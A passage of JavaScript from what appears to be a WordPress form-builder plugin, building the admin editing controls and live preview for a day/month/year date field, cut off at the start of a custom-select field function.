		
	var el_label_position_label = document.createElement('label');
			        el_label_position_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_label_position_label.innerHTML = "Field label position";
	
	var el_label_position1 = document.createElement('input');
                el_label_position1.setAttribute("id", "edit_for_label_position_top");
                el_label_position1.setAttribute("type", "radio");
                el_label_position1.setAttribute("value", "left");
                

                el_label_position1.setAttribute("name", "edit_for_label_position");
                el_label_position1.setAttribute("onchange", "label_left("+i+")");
				el_label_position1.setAttribute("checked", "checked");
		Left = document.createTextNode("Left");
		
	var el_label_position2 = document.createElement('input');
                el_label_position2.setAttribute("id", "edit_for_label_position_left");
                el_label_position2.setAttribute("type", "radio");
                el_label_position2.setAttribute("value", "top");
				
                el_label_position2.setAttribute("name", "edit_for_label_position");
                el_label_position2.setAttribute("onchange", "label_top("+i+")");
		Top = document.createTextNode("Top");
		
	if(w_field_label_pos=="top")
	
				el_label_position2.setAttribute("checked", "checked");
	else
				el_label_position1.setAttribute("checked", "checked");


	var el_fields_divider_label = document.createElement('label');
		el_fields_divider_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_fields_divider_label.innerHTML = "Fields separator";
	
	var el_fields_divider = document.createElement('input');
        el_fields_divider.setAttribute("id", "edit_for_fields_divider");
        el_fields_divider.setAttribute("type", "text");
        el_fields_divider.setAttribute("value", w_divider);
        el_fields_divider.style.cssText = "margin-left:15px; width:80px";
        el_fields_divider.setAttribute("onKeyUp", "set_divider('"+i+"', this.value)");
			
/////////////////////////////////////////////////////////////////////////////////
//////////////////////////////// D A Y //////////////////////////////////////////
/////////////////////////////////////////////////////////////////////////////////
		
	var el_day_field_type_label = document.createElement('label');
				el_day_field_type_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
				el_day_field_type_label.innerHTML = "Day field type";
	
	var el_day_field_type_input1 = document.createElement('input');
                el_day_field_type_input1.setAttribute("id", "el_day_field_type_text");
                el_day_field_type_input1.setAttribute("type", "radio");
                el_day_field_type_input1.setAttribute("value", "text");
                el_day_field_type_input1.setAttribute("name", "edit_for_day_field_type");
                el_day_field_type_input1.setAttribute("onchange", "field_to_text("+i+", 'day')");
		Text_1 = document.createTextNode("Input");
		
	var el_day_field_type_input2 = document.createElement('input');
                el_day_field_type_input2.setAttribute("id", "el_day_field_type_select");
                el_day_field_type_input2.setAttribute("type", "radio");
                el_day_field_type_input2.setAttribute("value", "select");
                el_day_field_type_input2.setAttribute("name", "edit_for_day_field_type");
                el_day_field_type_input2.setAttribute("onchange", "field_to_select("+i+", 'day')");
		Select_1= document.createTextNode("Select");
		
	if(w_day_type=="SELECT")
				el_day_field_type_input2.setAttribute("checked", "checked");
	else
				el_day_field_type_input1.setAttribute("checked", "checked");
		
	var el_day_field_size_label = document.createElement('label');
	    el_day_field_size_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_day_field_size_label.innerHTML = "Day field size(px)";
	
	var el_day_field_size_input = document.createElement('input');
        el_day_field_size_input.setAttribute("id", "edit_for_day_size");
		el_day_field_size_input.setAttribute("type", "text");
		el_day_field_size_input.setAttribute("value", w_day_size);
		el_day_field_size_input.setAttribute("onKeyPress", "return check_isnum(event)");
		el_day_field_size_input.setAttribute("onKeyUp", "change_w_style('"+i+"_dayform_id_temp', this.value)");
       //el_day_field_size_input.setAttribute("onKeyUp", "change_w_style('"+i+"_elementform_id_temp', this.value)");
				
	/*var el_day_field_text_label = document.createElement('label');
	    el_day_field_text_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_day_field_text_label.innerHTML = "Day label";
	
	var el_day_field_text_input = document.createElement('input');
        el_day_field_text_input.setAttribute("id", "edit_for_day_text");
		el_day_field_text_input.setAttribute("type", "text");
		el_day_field_text_input.setAttribute("value", w_day_label);
		//el_day_field_size_input.setAttribute("onKeyPress", "return check_isnum(event)");
        el_day_field_text_input.setAttribute("onKeyUp", "change_w_label('"+i+"_day_label', this.value)");*/
				
				
/////////////////////////////////////////////////////////////////////////////////
//////////////////////////////// M O N T H //////////////////////////////////////
/////////////////////////////////////////////////////////////////////////////////
		
	var el_month_field_type_label = document.createElement('label');
				el_month_field_type_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
				el_month_field_type_label.innerHTML = "Month field type";
	
	var el_month_field_type_input1 = document.createElement('input');
                el_month_field_type_input1.setAttribute("id", "el_month_field_type_text");
                el_month_field_type_input1.setAttribute("type", "radio");
                el_month_field_type_input1.setAttribute("value", "text");
                el_month_field_type_input1.setAttribute("name", "edit_for_month_field_type");
                el_month_field_type_input1.setAttribute("onchange", "field_to_text("+i+", 'month')");
		Text_2 = document.createTextNode("Input");
		
	var el_month_field_type_input2 = document.createElement('input');
                el_month_field_type_input2.setAttribute("id", "el_month_field_type_select");
                el_month_field_type_input2.setAttribute("type", "radio");
                el_month_field_type_input2.setAttribute("value", "select");
                el_month_field_type_input2.setAttribute("name", "edit_for_month_field_type");
                el_month_field_type_input2.setAttribute("onchange", "field_to_select("+i+", 'month')");
		Select_2 = document.createTextNode("Select");
		
	if(w_month_type=="SELECT")
				el_month_field_type_input2.setAttribute("checked", "checked");
	else
				el_month_field_type_input1.setAttribute("checked", "checked");
		
	var el_month_field_size_label = document.createElement('label');
	    el_month_field_size_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_month_field_size_label.innerHTML = "Month field size(px) ";
	
	var el_month_field_size_input = document.createElement('input');
        el_month_field_size_input.setAttribute("id", "edit_for_month_size");
		el_month_field_size_input.setAttribute("type", "text");
		el_month_field_size_input.setAttribute("value", w_month_size);
		el_month_field_size_input.setAttribute("onKeyPress", "return check_isnum(event)");
		el_month_field_size_input.setAttribute("onKeyUp", "change_w_style('"+i+"_monthform_id_temp', this.value)");
				
	/*var el_month_field_text_label = document.createElement('label');
	    el_month_field_text_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_month_field_text_label.innerHTML = "Month label";
	
	var el_month_field_text_input = document.createElement('input');
        el_month_field_text_input.setAttribute("id", "edit_for_month_text");
		el_month_field_text_input.setAttribute("type", "text");
		el_month_field_text_input.setAttribute("value", w_month_label);
		//el_month_field_size_input.setAttribute("onKeyPress", "return check_isnum(event)");
        el_month_field_text_input.setAttribute("onKeyUp", "change_w_label('"+i+"_month_label', this.value)");*/
				
	


/////////////////////////////////////////////////////////////////////////////////
////////////////////////////////  Y E A R  //////////////////////////////////////
/////////////////////////////////////////////////////////////////////////////////
		
	var el_year_field_type_label = document.createElement('label');
				el_year_field_type_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
				el_year_field_type_label.innerHTML = "Year field type";
	
	var el_year_field_type_input1 = document.createElement('input');
                el_year_field_type_input1.setAttribute("id", "el_year_field_type_text");
                el_year_field_type_input1.setAttribute("type", "radio");
                el_year_field_type_input1.setAttribute("value", "text");
                el_year_field_type_input1.setAttribute("name", "edit_for_year_field_type");
                el_year_field_type_input1.setAttribute("onchange", "field_to_text("+i+", 'year')");
		Text_3 = document.createTextNode("Input");
		
	var el_year_field_type_input2 = document.createElement('input');
                el_year_field_type_input2.setAttribute("id", "el_year_field_type_select");
                el_year_field_type_input2.setAttribute("type", "radio");
                el_year_field_type_input2.setAttribute("value", "select");
                el_year_field_type_input2.setAttribute("name", "edit_for_year_field_type");
                el_year_field_type_input2.setAttribute("onchange", "field_to_select("+i+", 'year')");
		Select_3 = document.createTextNode("Select");
		
	if(w_year_type=="SELECT")
				el_year_field_type_input2.setAttribute("checked", "checked");
	else
				el_year_field_type_input1.setAttribute("checked", "checked");
		
	var el_year_field_interval_label = document.createElement('label');
	    el_year_field_interval_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_year_field_interval_label.innerHTML = "Year interval";
	
	var el_year_field_interval_from_input = document.createElement('input');
        el_year_field_interval_from_input.setAttribute("id", "edit_for_year_interval_from");
		el_year_field_interval_from_input.setAttribute("type", "text");
		el_year_field_interval_from_input.setAttribute("value", w_from);
		el_year_field_interval_from_input.style.cssText ="width:40px";
		el_year_field_interval_from_input.setAttribute("onKeyPress", "return check_isnum(event)");
        el_year_field_interval_from_input.setAttribute("onChange", "year_interval("+i+")");
		
	Line = document.createTextNode(" - ");
			
	var el_year_field_interval_to_input = document.createElement('input');
        el_year_field_interval_to_input.setAttribute("id", "edit_for_year_interval_to");
		el_year_field_interval_to_input.setAttribute("type", "text");
		el_year_field_interval_to_input.setAttribute("value", w_to);
		el_year_field_interval_to_input.style.cssText ="width:40px";
		el_year_field_interval_to_input.setAttribute("onKeyPress", "return check_isnum(event)");
        el_year_field_interval_to_input.setAttribute("onChange", "year_interval("+i+")");
				
	var el_year_field_size_label = document.createElement('label');
	    el_year_field_size_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_year_field_size_label.innerHTML = "Year field size(px)";
	
	var el_year_field_size_input = document.createElement('input');
        el_year_field_size_input.setAttribute("id", "edit_for_year_size");
		el_year_field_size_input.setAttribute("type", "text");
		el_year_field_size_input.setAttribute("value", w_year_size);
		el_year_field_size_input.setAttribute("onKeyPress", "return check_isnum(event)");
        el_year_field_size_input.setAttribute("onKeyUp", "change_w_style('"+i+"_yearform_id_temp', this.value)");
				
	/*var el_year_field_text_label = document.createElement('label');
	    el_year_field_text_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_year_field_text_label.innerHTML = "Year label";
	
	var el_year_field_text_input = document.createElement('input');
        el_year_field_text_input.setAttribute("id", "edit_for_year_text");
		el_year_field_text_input.setAttribute("type", "text");
		el_year_field_text_input.setAttribute("value", w_year_label);
		//el_year_field_size_input.setAttribute("onKeyPress", "return check_isnum(event)");
        el_year_field_text_input.setAttribute("onKeyUp", "change_w_label('"+i+"_year_label', this.value)");*/
				
				
	
///////////////////////////////
///////////////////// End /////
			
				
				
	var el_style_label = document.createElement('label');
	        el_style_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_style_label.innerHTML = "Class name";
	
	var el_style_textarea = document.createElement('input');
                el_style_textarea.setAttribute("id", "element_style");
		el_style_textarea.setAttribute("type", "text");
		el_style_textarea.setAttribute("value", w_class);
                el_style_textarea.style.cssText = "width:200px;";
                el_style_textarea.setAttribute("onChange", "change_class(this.value,'"+i+"')");

	var el_required_label = document.createElement('label');
	        el_required_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_required_label.innerHTML = "Required";
	
	var el_required = document.createElement('input');
                el_required.setAttribute("id", "el_send");
                el_required.setAttribute("type", "checkbox");
                el_required.setAttribute("value", "yes");
                el_required.setAttribute("onclick", "set_required('"+i+"_required')");
	if(w_required=="yes")
			
                el_required.setAttribute("checked", "checked");
		
	var el_attr_label = document.createElement('label');
	                el_attr_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_attr_label.innerHTML = "Additional Attributes";
	var el_attr_add = document.createElement('img');
                el_attr_add.setAttribute("id", "el_choices_add");
           	el_attr_add.setAttribute("src", fmc_plugin_url+'/images/add.png');
            	el_attr_add.style.cssText = 'cursor:pointer; margin-left:68px';
            	el_attr_add.setAttribute("title", 'add');
                el_attr_add.setAttribute("onClick", "add_attr("+i+", 'type_date_fields')");
	var el_attr_table = document.createElement('table');
                el_attr_table.setAttribute("id", 'attributes');
                el_attr_table.setAttribute("border", '0');
        	el_attr_table.style.cssText = 'margin-left:0px';
	var el_attr_tr_label = document.createElement('tr');
                el_attr_tr_label.setAttribute("idi", '0');
	var el_attr_td_name_label = document.createElement('th');
            	el_attr_td_name_label.style.cssText = 'width:100px';
	var el_attr_td_value_label = document.createElement('th');
            	el_attr_td_value_label.style.cssText = 'width:100px';
	var el_attr_td_X_label = document.createElement('th');
            	el_attr_td_X_label.style.cssText = 'width:10px';
	var el_attr_name_label = document.createElement('label');
	                el_attr_name_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 11px";
			el_attr_name_label.innerHTML = "Name";
			
	var el_attr_value_label = document.createElement('label');
	                el_attr_value_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 11px";
			el_attr_value_label.innerHTML = "Value";
			
	el_attr_table.appendChild(el_attr_tr_label);
	el_attr_tr_label.appendChild(el_attr_td_name_label);
	el_attr_tr_label.appendChild(el_attr_td_value_label);
	el_attr_tr_label.appendChild(el_attr_td_X_label);
	el_attr_td_name_label.appendChild(el_attr_name_label);
	el_attr_td_value_label.appendChild(el_attr_value_label);
	
	n=w_attr_name.length;
	for(j=1; j<=n; j++)
	{	
		var el_attr_tr = document.createElement('tr');
			el_attr_tr.setAttribute("id", "attr_row_"+j);
			el_attr_tr.setAttribute("idi", j);
		var el_attr_td_name = document.createElement('td');
			el_attr_td_name.style.cssText = 'width:100px';
		var el_attr_td_value = document.createElement('td');
			el_attr_td_value.style.cssText = 'width:100px';
		
		var el_attr_td_X = document.createElement('td');
		var el_attr_name = document.createElement('input');
	
			el_attr_name.setAttribute("type", "text");
	
			el_attr_name.style.cssText = "width:100px";
			el_attr_name.setAttribute("value", w_attr_name[j-1]);
			el_attr_name.setAttribute("id", "attr_name"+j);
			el_attr_name.setAttribute("onChange", "change_attribute_name("+i+", this, 'type_date_fields')");
			
		var el_attr_value = document.createElement('input');
	
			el_attr_value.setAttribute("type", "text");
	
			el_attr_value.style.cssText = "width:100px";
			el_attr_value.setAttribute("value", w_attr_value[j-1]);
			el_attr_value.setAttribute("id", "attr_value"+j);
			el_attr_value.setAttribute("onChange", "change_attribute_value("+i+", "+j+", 'type_date_fields')");
	
		var el_attr_remove = document.createElement('img');
			el_attr_remove.setAttribute("id", "el_choices"+j+"_remove");
			el_attr_remove.setAttribute("src", fmc_plugin_url+'/images/delete.png');
			el_attr_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:3px';
			el_attr_remove.setAttribute("align", 'top');
			el_attr_remove.setAttribute("onClick", "remove_attr("+j+", "+i+", 'type_date_fields')");
		el_attr_table.appendChild(el_attr_tr);
		el_attr_tr.appendChild(el_attr_td_name);
		el_attr_tr.appendChild(el_attr_td_value);
		el_attr_tr.appendChild(el_attr_td_X);
		el_attr_td_name.appendChild(el_attr_name);
		el_attr_td_value.appendChild(el_attr_value);
		el_attr_td_X.appendChild(el_attr_remove);
		
	}

	var t  = document.getElementById('edit_table');
	
	var br = document.createElement('br');
	var br1 = document.createElement('br');
	var br2 = document.createElement('br');
	var br3 = document.createElement('br');
	var br4 = document.createElement('br');
	var br5 = document.createElement('br');
	var br6 = document.createElement('br');
	var br7 = document.createElement('br');
	var br8 = document.createElement('br');
	var br9 = document.createElement('br');
	var br10 = document.createElement('br');
	var br11 = document.createElement('br');
	var br12 = document.createElement('br');
	var br13 = document.createElement('br');
	var br14 = document.createElement('br');
	var br15 = document.createElement('br');
	var br16 = document.createElement('br');
	var br17 = document.createElement('br');
	var br18 = document.createElement('br');
	
	edit_main_td1.appendChild(el_label_label);
	edit_main_td1_1.appendChild(el_label_textarea);

	edit_main_td2.appendChild(el_label_position_label);
	edit_main_td2_1.appendChild(el_label_position1);
	edit_main_td2_1.appendChild(Left);
	edit_main_td2_1.appendChild(br2);
	edit_main_td2_1.appendChild(el_label_position2);
	edit_main_td2_1.appendChild(Top);

	edit_main_td3.appendChild(el_fields_divider_label);
	edit_main_td3_1.appendChild(el_fields_divider);
	//////////////////////////////////////////////////////////////////////////
	//////////////////////////////////////////////////////////////////////////
	//////////////////////////////////////////////////////////////////////////
	
	
	edit_main_td4.appendChild(el_day_field_type_label);
	edit_main_td4.appendChild(br);
	edit_main_td4.appendChild(el_day_field_size_label);
	// edit_main_td4.appendChild(br1);
	// edit_main_td4.appendChild(el_day_field_text_label);
	
	edit_main_td4_1.appendChild(el_day_field_type_input1);
	edit_main_td4_1.appendChild(Text_1);
	edit_main_td4_1.appendChild(el_day_field_type_input2);
	edit_main_td4_1.appendChild(Select_1);
	edit_main_td4_1.appendChild(br4);
	edit_main_td4_1.appendChild(el_day_field_size_input);
	// edit_main_td4_1.appendChild(br5);
	// edit_main_td4_1.appendChild(el_day_field_text_input);
	
	
	edit_main_td8.appendChild(el_month_field_type_label);
	edit_main_td8.appendChild(br11);
	edit_main_td8.appendChild(el_month_field_size_label);
	// edit_main_td8.appendChild(br12);
	// edit_main_td8.appendChild(el_month_field_text_label);
	edit_main_td8_1.appendChild(el_month_field_type_input1);
	edit_main_td8_1.appendChild(Text_2);
	edit_main_td8_1.appendChild(el_month_field_type_input2);
	edit_main_td8_1.appendChild(Select_2);
	edit_main_td8_1.appendChild(br6);
	edit_main_td8_1.appendChild(el_month_field_size_input);
	// edit_main_td8_1.appendChild(br7);
	// edit_main_td8_1.appendChild(el_month_field_text_input);



	edit_main_td9.appendChild(el_year_field_type_label);
	edit_main_td9.appendChild(br13);
	edit_main_td9.appendChild(el_year_field_interval_label);
	edit_main_td9.appendChild(br14);
	edit_main_td9.appendChild(el_year_field_size_label);
	// edit_main_td9.appendChild(br15);
	// edit_main_td9.appendChild(el_year_field_text_label);
	edit_main_td9_1.appendChild(el_year_field_type_input1);
	edit_main_td9_1.appendChild(Text_3);
	edit_main_td9_1.appendChild(el_year_field_type_input2);
	edit_main_td9_1.appendChild(Select_3);
	edit_main_td9_1.appendChild(br8);
	edit_main_td9_1.appendChild(el_year_field_interval_from_input);
	edit_main_td9_1.appendChild(Line);
	edit_main_td9_1.appendChild(el_year_field_interval_to_input);
	edit_main_td9_1.appendChild(br9);
	edit_main_td9_1.appendChild(el_year_field_size_input);
	// edit_main_td9_1.appendChild(br10);
	// edit_main_td9_1.appendChild(el_year_field_text_input);
	
	
	
	//////////////////////////////////////////////////////////////////////////
	//////////////////////////////////////////////////////////////////////////
	//////////////////////////////////////////////////////////////////////////
	edit_main_td5.appendChild(el_style_label);
	edit_main_td5_1.appendChild(el_style_textarea);
	
	edit_main_td6.appendChild(el_required_label);
	edit_main_td6_1.appendChild(el_required);
	
	edit_main_td7.appendChild(el_attr_label);
	edit_main_td7.appendChild(el_attr_add);
	edit_main_td7.appendChild(br3);
	edit_main_td7.appendChild(el_attr_table);
	edit_main_td7.setAttribute("colspan", "2");

	edit_main_tr1.appendChild(edit_main_td1);
	edit_main_tr1.appendChild(edit_main_td1_1);
	edit_main_tr2.appendChild(edit_main_td2);
	edit_main_tr2.appendChild(edit_main_td2_1);
	edit_main_tr3.appendChild(edit_main_td3);
	edit_main_tr3.appendChild(edit_main_td3_1);
	edit_main_tr4.appendChild(edit_main_td4);
	edit_main_tr4.appendChild(edit_main_td4_1);
	edit_main_tr8.appendChild(edit_main_td8);
	edit_main_tr8.appendChild(edit_main_td8_1);
	edit_main_tr9.appendChild(edit_main_td9);
	edit_main_tr9.appendChild(edit_main_td9_1);
	edit_main_tr5.appendChild(edit_main_td5);
	edit_main_tr5.appendChild(edit_main_td5_1);
	edit_main_tr6.appendChild(edit_main_td6);
	edit_main_tr6.appendChild(edit_main_td6_1);
	edit_main_tr7.appendChild(edit_main_td7);
	edit_main_tr7.appendChild(edit_main_td7_1);
	edit_main_table.appendChild(edit_main_tr1);
	edit_main_table.appendChild(edit_main_tr2);
	edit_main_table.appendChild(edit_main_tr3);
	edit_main_table.appendChild(edit_main_tr4);
	edit_main_table.appendChild(edit_main_tr8);
	edit_main_table.appendChild(edit_main_tr9);
	edit_main_table.appendChild(edit_main_tr5);
	edit_main_table.appendChild(edit_main_tr6);
	edit_main_table.appendChild(edit_main_tr7);
	edit_div.appendChild(edit_main_table);
	
	t.appendChild(edit_div);
	add_id_and_name(i, 'type_date_fields');
//show table
	var adding_type = document.createElement("input");
            adding_type.setAttribute("type", "hidden");
            adding_type.setAttribute("value", "type_date_fields");
            adding_type.setAttribute("name", i+"_typeform_id_temp");
            adding_type.setAttribute("id", i+"_typeform_id_temp");
	var adding_required = document.createElement("input");
            adding_required.setAttribute("type", "hidden");
            adding_required.setAttribute("value", w_required);
            adding_required.setAttribute("name", i+"_requiredform_id_temp");
            adding_required.setAttribute("id", i+"_requiredform_id_temp");
			
     	var div = document.createElement('div');
      	    div.setAttribute("id", "main_div");
				var div_for_editable_labels = document.createElement('div');
			div_for_editable_labels.setAttribute("style", "margin-left:4px; color:red;");
			
      	edit_labels = document.createTextNode("The labels of the fields are editable. Please, click the label to edit.");

		div_for_editable_labels.appendChild(edit_labels);
      	var table = document.createElement('table');
           	table.setAttribute("id", i+"_elemet_tableform_id_temp");
			
      	var tr = document.createElement('tr');
			
      	var td1 = document.createElement('td');
         	td1.setAttribute("valign", 'top');
         	td1.setAttribute("align", 'left');
           	td1.setAttribute("id", i+"_label_sectionform_id_temp");
			
      	var td2 = document.createElement('td');
        	td2.setAttribute("valign", 'middle');
         	td2.setAttribute("align", 'left');
           	td2.setAttribute("id", i+"_element_sectionform_id_temp");
			
      	var table_date = document.createElement('table');
           	table_date.setAttribute("id", i+"_table_date");
           	table_date.setAttribute("cellpadding", '0');
           	table_date.setAttribute("cellspacing", '0');
			
      	var tr_date1 = document.createElement('tr');
           	tr_date1.setAttribute("id", i+"_tr_date1");
			
      	var tr_date2 = document.createElement('tr');
           	tr_date2.setAttribute("id", i+"_tr_date2");
			
      	var td_date_input1 = document.createElement('td');
           	td_date_input1.setAttribute("id", i+"_td_date_input1");
			
      	var td_date_separator1 = document.createElement('td');
           	td_date_separator1.setAttribute("id", i+"_td_date_separator1");
			
      	var td_date_input2 = document.createElement('td');
           	td_date_input2.setAttribute("id", i+"_td_date_input2");
			
      	var td_date_separator2 = document.createElement('td');
           	td_date_separator2.setAttribute("id", i+"_td_date_separator2");
			
      	var td_date_input3 = document.createElement('td');
           	td_date_input3.setAttribute("id", i+"_td_date_input3");

      	var td_date_label1 = document.createElement('td');
           	td_date_label1.setAttribute("id", i+"_td_date_label1");
      	var td_date_label_empty1 = document.createElement('td');
			
      	var td_date_label2 = document.createElement('td');
           	td_date_label2.setAttribute("id", i+"_td_date_label2");
      	var td_date_label_empty2 = document.createElement('td');
			
      	var td_date_label3 = document.createElement('td');
           	td_date_label3.setAttribute("id", i+"_td_date_label3");
			
      	var br1 = document.createElement('br');
      	var br2 = document.createElement('br');
     	var br3 = document.createElement('br');
      	var br4 = document.createElement('br');
      

      	var label = document.createElement('span');
		label.setAttribute("id", i+"_element_labelform_id_temp");
		label.innerHTML = w_field_label;
		label.setAttribute("class", "label");
      	var required = document.createElement('span');
			required.setAttribute("id", i+"_required_elementform_id_temp");
			required.innerHTML = "";
			required.setAttribute("class", "required");
	if(w_required=="yes")
			required.innerHTML = " *";


	var day = document.createElement('input');
		day.setAttribute("type", 'text');
		day.setAttribute("value", w_day);
	    //day.setAttribute("class", "time_box");
	    day.setAttribute("id", i+"_dayform_id_temp");
	    day.setAttribute("name", i+"_dayform_id_temp");
		day.setAttribute("onChange", "change_value('"+i+"_dayform_id_temp')");
		day.setAttribute("onKeyPress", "return check_day(event, '"+i+"_dayform_id_temp')");
	    day.setAttribute("onBlur", "if (this.value=='0') this.value=''; else add_0('"+i+"_dayform_id_temp')");
		day.style.width=w_day_size+'px';
	  

	  /* hh.setAttribute("onKeyPress", "return check_hour(event, '"+i+"_hhform_id_temp', '23')");
	    hh.setAttribute("onKeyUp", "change_hour(event, '"+i+"_hhform_id_temp','23')");
	    hh.setAttribute("onBlur", "add_0('"+i+"_hhform_id_temp')");*/
			
	var day_label = document.createElement('label');
	    day_label.setAttribute("class", "mini_label");
	    day_label.setAttribute("id", i+"_day_label");
	    day_label.innerHTML=w_day_label;
			
	var day_ = document.createElement('span');
	    day_.setAttribute("id", i+"_separator1");
	    day_.setAttribute("class", "wdform_separator");
	    day_.innerHTML=w_divider;
		
	var month = document.createElement('input');
        month.setAttribute("type", 'text');
		month.setAttribute("value", w_month);
		//month.setAttribute("class", "time_box");
		month.setAttribute("id", i+"_monthform_id_temp");
	    month.setAttribute("name", i+"_monthform_id_temp");
		month.style.width=w_month_size+'px';
		month.setAttribute("onKeyPress", "return check_month(event, '"+i+"_monthform_id_temp')");
		month.setAttribute("onChange", "change_value('"+i+"_monthform_id_temp')");
	    month.setAttribute("onBlur", "if (this.value=='0') this.value=''; else add_0('"+i+"_monthform_id_temp')");
		/*month.setAttribute("onKeyPress", "return check_minute(event, '"+i+"_mmform_id_temp')");
	    month.setAttribute("onKeyUp", "change_minute(event, '"+i+"_mmform_id_temp')");
		month.setAttribute("onBlur", "add_0('"+i+"_mmform_id_temp')");*/
		
	var month_label = document.createElement('label');
		month_label.setAttribute("class", "mini_label");
		month_label.setAttribute("class", "mini_label");
	    month_label.setAttribute("id", i+"_month_label");
		month_label.innerHTML=w_month_label;
			
	var month_ = document.createElement('span');
	    month_.setAttribute("id", i+"_separator2");
	    month_.setAttribute("class", "wdform_separator");
		month_.innerHTML=w_divider;
		
	var year = document.createElement('input');
        year.setAttribute("type", 'text');
        year.setAttribute("from", w_from);
        year.setAttribute("to", w_to);
		year.setAttribute("value", w_year);
		//year.setAttribute("class", "time_box");
		year.setAttribute("id", i+"_yearform_id_temp");
		year.setAttribute("name", i+"_yearform_id_temp");
		year.style.width=w_year_size+'px';
		year.setAttribute("onChange", "change_year('"+i+"_yearform_id_temp')");
		year.setAttribute("onKeyPress", "return check_year1(event, '"+i+"_yearform_id_temp')");
		year.setAttribute("onBlur", "check_year2('"+i+"_yearform_id_temp')");
		/*year.setAttribute("onKeyPress", "return check_second(event, '"+i+"_ssform_id_temp')");
		year.setAttribute("onKeyUp", "change_second('"+i+"_ssform_id_temp')");
		year.setAttribute("onBlur", "add_0('"+i+"_ssform_id_temp')");*/

	var year_label = document.createElement('label');
		year_label.setAttribute("class", "mini_label");
	    year_label.setAttribute("id", i+"_year_label");
		year_label.innerHTML=w_year_label;
			
    var main_td  = document.getElementById('show_table');
      
      	td1.appendChild(label);
      	td1.appendChild(required);
		
		
		
		td_date_input1.appendChild(day);
      	td_date_separator1.appendChild(day_);
      	td_date_input2.appendChild(month);
      	td_date_separator2.appendChild(month_);
      	td_date_input3.appendChild(year);
      	tr_date1.appendChild(td_date_input1);
      	tr_date1.appendChild(td_date_separator1);
      	tr_date1.appendChild(td_date_input2);
      	tr_date1.appendChild(td_date_separator2);
      	tr_date1.appendChild(td_date_input3);
		
      	td_date_label1.appendChild(day_label);
      	td_date_label2.appendChild(month_label);
      	td_date_label3.appendChild(year_label);
      	tr_date2.appendChild(td_date_label1);
      	tr_date2.appendChild(td_date_label_empty1);
      	tr_date2.appendChild(td_date_label2);
      	tr_date2.appendChild(td_date_label_empty2);
      	tr_date2.appendChild(td_date_label3);
      	table_date.appendChild(tr_date1);
      	table_date.appendChild(tr_date2);
		
      	td2.appendChild(adding_type);
      	td2.appendChild(adding_required);
		td2.appendChild(table_date);
      	tr.appendChild(td1);
      	tr.appendChild(td2);
      	table.appendChild(tr);
      
      	div.appendChild(table);
      	div.appendChild(br3);
        div.appendChild(div_for_editable_labels);
      	main_td.appendChild(div);

	if(w_field_label_pos=="top")
				label_top(i);
	
	if(w_day_type=="SELECT")
			field_to_select(i, 'day');
			
	if(w_month_type=="SELECT")
			field_to_select(i, 'month');
			
	if(w_year_type=="SELECT")
			field_to_select(i, 'year');
  change_class(w_class, i);
  refresh_attr(i, 'type_date_fields');
  jQuery(document).ready(function() {	
    jQuery("label#"+i+"_day_label").click(function() {
      if (jQuery(this).children('input').length == 0) {
        var day = "<input type='text' class='day' size='8' style='outline:none; border:none; background:none;' value=\""+jQuery(this).text()+"\">";
        jQuery(this).html(day);							
        jQuery("input.day").focus();			
        jQuery("input.day").blur(function() {
          var value = jQuery(this).val();
          jQuery("#"+i+"_day_label").text(value);
        });
      }
    });
    jQuery("label#"+i+"_month_label").click(function() {	
      if (jQuery(this).children('input').length == 0) {		
        var month = "<input type='text' class='month' size='8' style='outline:none; border:none; background:none;' value=\""+jQuery(this).text()+"\">";	
        jQuery(this).html(month);			
        jQuery("input.month").focus();					
        jQuery("input.month").blur(function() {			
          var value = jQuery(this).val();			
          jQuery("#"+i+"_month_label").text(value);	
        });	
      }	
    });
    jQuery("label#"+i+"_year_label").click(function() {	
      if (jQuery(this).children('input').length == 0) {		
        var year = "<input type='text' class='year' size='8' style='outline:none; border:none; background:none;' value=\""+jQuery(this).text()+"\">";	
        jQuery(this).html(year);			
        jQuery("input.year").focus();					
        jQuery("input.year").blur(function() {			
          var value = jQuery(this).val();			
          jQuery("#"+i+"_year_label").text(value);
        });
      }
    });
	});
}

function type_own_select(i, w_field_label, w_field_label_pos, w_size, w_choices, w_choices_checked, w_required, w_class, w_attr_name, w_attr_value, w_choices_disabled){
	document.getElementById("element_type").value="type_own_select";
	delete_last_child();
// edit table	
	var edit_div  = document.createElement('div');
		edit_div.setAttribute("id", "edit_div");
		edit_div.setAttribute("style", "border-top:1px dotted black;padding:10px;  padding-top:0px; padding-bottom:0px; margin-top:10px;");
		
	var edit_main_table  = document.createElement('table');
		edit_main_table.setAttribute("id", "edit_main_table");
		edit_main_table.setAttribute("cellpadding", "0");
		edit_main_table.setAttribute("cellspacing", "0");
		
	var edit_main_tr1  = document.createElement('tr');
      		edit_main_tr1.setAttribute("valing", "top");
		
	var edit_main_tr2  = document.createElement('tr');
      		edit_main_tr2.setAttribute("valing", "top");
		
	var edit_main_tr3  = document.createElement('tr');
      		edit_main_tr3.setAttribute("valing", "top");
		
	var edit_main_tr4  = document.createElement('tr');
      		edit_main_tr4.setAttribute("valing", "top");
		
	var edit_main_tr5  = document.createElement('tr');
      		edit_main_tr5.setAttribute("valing", "top");
			
	var edit_main_tr6  = document.createElement('tr');
      		edit_main_tr6.setAttribute("valing", "top");
	var edit_main_tr7  = document.createElement('tr');
      		edit_main_tr7.setAttribute("valing", "top");

	var edit_main_td1 = document.createElement('td');
		edit_main_td1.style.cssText = "padding-top:10px";	
